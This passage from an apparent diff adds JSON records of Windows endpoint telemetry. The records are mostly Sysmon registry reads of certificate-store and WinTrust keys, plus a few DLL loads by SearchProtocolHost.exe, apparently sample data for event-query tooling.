"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "Windows.StateRepositoryPS.dll", + "image_path": "C:\\Windows\\System32\\Windows.StateRepositoryPS.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "edputil.dll", + "image_path": "C:\\Windows\\System32\\edputil.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 